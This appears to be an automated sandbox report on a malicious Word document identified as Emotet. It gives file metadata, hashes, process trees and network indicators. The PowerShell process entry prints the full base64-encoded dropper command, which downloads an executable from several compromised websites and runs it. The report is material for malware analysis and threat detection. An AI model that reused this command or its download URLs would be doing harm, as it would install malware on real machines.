File name: | document.doc |
Full analysis: | https://app.any.run/tasks/92323711-715f-481b-b062-715db5ab76ad |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:44:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: integrate Colombia, Subject: solution, Author: Irving Blick, Comments: teal Platinum Handmade, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 16:20:00 2019, Last Saved Time/Date: Wed Sep 18 16:20:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 805AD6A3A429E4BA53C5623C96341060 |
SHA1: | ACF55B554581701EC9D7EA28AA5538FC3BD8492A |
SHA256: | 291108E76AA29A2CFFE54FBB938938F3C0B3495276481B7FD92869188828B35D |
SSDEEP: | 6144:x27TDDp6PuaNsxDVN+bk0USWQ5EAnYCyDrgMOqu3rPyuFOarSAL3EnCfc39uK5Mj:x27TDDp6PuaNsxDVW5sLmoXn7NSU4Ve4 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Rippin |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 641 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | Corkery LLC |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 547 |
Words: | 95 |
Pages: | 1 |
ModifyDate: | 2019:09:18 15:20:00 |
CreateDate: | 2019:09:18 15:20:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | teal Platinum Handmade |
Keywords: | - |
Author: | Irving Blick |
Subject: | solution |
Title: | integrate Colombia |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\document.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3676 | powershell -encod JABJADQAMQBuAGsAZgBaAHQAPQAnAFUAYwBsAGkAbAAxAEsANQAnADsAJAB3ADIAcQBxAHAAUABoACAAPQAgACcANQAzADYAJwA7ACQAcgBpAFEASQBaAG8AQwA9ACcAbgBpADMAQwBGAEcAcAAnADsAJABjAFMAdwAyAE8AagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwAyAHEAcQBwAFAAaAArACcALgBlAHgAZQAnADsAJABwAFcASAA0AGgAegBFAFYAPQAnAHIAaQBXAF8AWABZACcAOwAkAFMAdQBrAFUAWABiAD0ALgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAFcARQBCAGMATABpAEUATgBUADsAJABKAEUAQQBiAHAAVgA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgByAG8AbwBrAGwAeQBuAGwAaQBsAGwAeQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFAAeQBWAE0AUwBwAEEAbAAvAEAAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbABmAGUAcgB0AGkAbABpAHQAeQBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAGMAbABhAHMAcwBpAGMALQBlAGQAaQB0AG8AcgAvAGoAegBiAE4AYgBvAG8AeQBMAC8AQABoAHQAdABwADoALwAvAG0AYQByAGMAbwBmAGEAbQBhAC4AaQB0AC8AbQBhAGkAbAAtAGkAYwBvAG4AcwAvAGwAdwBuAGUAaQA3AC0AZAB4AGkAaAA1ADAAcwA5AHAALQA4ADgAMwAyADAAOQAzADEANgAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGsAMQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGsAdABUAEEAYwBiAE4ALwBAAGgAdAB0AHAAOgAvAC8AZAByAGEAcABhAHIAdAAuAG8AcgBnAC8AUAByAGUAbgBzAGEALwBrADAAdgBpAHYANgA4AC0ANQB2ADUALQAyADEAMwA3AC8AJwAuACIAcwBwAGAATABpAHQAIgAoACcAQAAnACkAOwAkAGQAaQBLADIAVwBxAHoAPQAnAGkAaQBZAGkATABsADcAdQAnADsAZgBvAHIAZQBhAGMAaAAoACQAbQBPAEEARgB3AHcAUAAwACAAaQBuACAAJABKAEUAQQBiAHAAVgApAHsAdAByAHkAewAkAFMAdQBrAFUAWABiAC4AIgBkAGAAbwB3AG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJABtAE8AQQBGAHcAdwBQADAALAAgACQAYwBTAHcAMgBPAGoAKQA7ACQAegA5AGkARQBFAFIAPQAnAEYAWgBqAGYAcAB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAYwBTAHcAMgBPAGoAKQAuACIATABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADQANQA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGEAYABSAFQAIgAoACQAYwBTAHcAMgBPAGoAKQA7ACQAcAA5AEEAYwBHAFQAPQAnAHAAMABtAHAANABiAFEAJwA7AGIAcgBlAGEAawA7ACQAVABhAEYAWgBHAGoAPQAnAGoAMQBRAEYANABuAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwB6AEoAdwAzAHAAagA9ACcAUABWAGoATgA5AFMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR885F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:28952035806F582B877137874ED63585 | SHA256:A4B8EBDED044A857566766A6A27AB30EF2EFBAE1155A099D36F2165C12AB8AF1 | |||
2808 | WINWORD.EXE | C:\Users\admin\Downloads\~$cument.doc | pgc | |
MD5:F0F15F884831035CFC4D0CCED43EA6D2 | SHA256:159FB004AFBE4678C2BE81B2CA67048F1305D24A26DD20A75187BC649854A622 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:40EF1C101BC649EA1C7F49FF01F1665C | SHA256:B7797CADAD976937D872026F16ED75C56113DB8E390BDAE665D156725B2CE141 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\371F9047.wmf | wmf | |
MD5:2C1907E7A6F3DBF00469ACBE0D462EAB | SHA256:0E6F4F2BBB2B4898BB83A4D87069DB6C484AEB26CB852C15966ACF00029124ED | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1B4E69C79E8CAC24C7D8C5E712EFC543 | SHA256:3FB7A8EE6DF417E9C41FC52071A634CA51437C8E36B11187D0FD9D4C5E170C9B | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A998F3C6.wmf | wmf | |
MD5:F1649C3862D64C946A53AE2064FDDA4F | SHA256:8200E201DF373751BE0532885E2EA26778AB7710E9414F7179873C99D8F70019 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\871ECB11.wmf | wmf | |
MD5:C134D0DC5A408B885230EB3F8870DFB0 | SHA256:775B7BD5BF2CA5AC5749ECDF6B9F55CDEB61F9F32BDC6DAC0D64B7EA9EB4D9C0 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\document.doc.LNK | lnk | |
MD5:9DD3A25C22D33DCA7EDABE37E3E48530 | SHA256:066BFE956244CE0399F7021C78254EC7696D3711FE878595E9A6930BECB6A1C7 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA9473CB.wmf | wmf | |
MD5:647A05753C7391B55338F37B5AFDF253 | SHA256:E7DE4C9237CFDB1D64193C2F7A4DF9201DE39FCB812EDF75B5B581D412FA9753 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3676 | powershell.exe | GET | 404 | 88.99.167.17:80 | http://blog.internationalfertilityacademy.com/wp-content/plugins/classic-editor/jzbNbooyL/ | DE | xml | 345 b | unknown |
3676 | powershell.exe | GET | 404 | 5.134.124.81:80 | http://marcofama.it/mail-icons/lwnei7-dxih50s9p-883209316/ | IT | xml | 345 b | unknown |
3676 | powershell.exe | GET | 404 | 45.33.37.47:80 | http://think1.com/wp-content/ktTAcbN/ | US | xml | 345 b | unknown |
3676 | powershell.exe | GET | 404 | 134.0.10.197:80 | http://drapart.org/Prensa/k0viv68-5v5-2137/ | ES | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3676 | powershell.exe | 88.99.167.17:80 | blog.internationalfertilityacademy.com | Hetzner Online GmbH | DE | unknown |
3676 | powershell.exe | 165.22.12.103:443 | www.brooklynlilly.com | — | US | unknown |
3676 | powershell.exe | 134.0.10.197:80 | drapart.org | 10dencehispahard, S.L. | ES | malicious |
3676 | powershell.exe | 5.134.124.81:80 | marcofama.it | ITnet S.r.l. | IT | unknown |
3676 | powershell.exe | 45.33.37.47:80 | think1.com | Linode, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.brooklynlilly.com |
| unknown |
blog.internationalfertilityacademy.com |
| unknown |
marcofama.it |
| unknown |
think1.com |
| unknown |
drapart.org |
| malicious |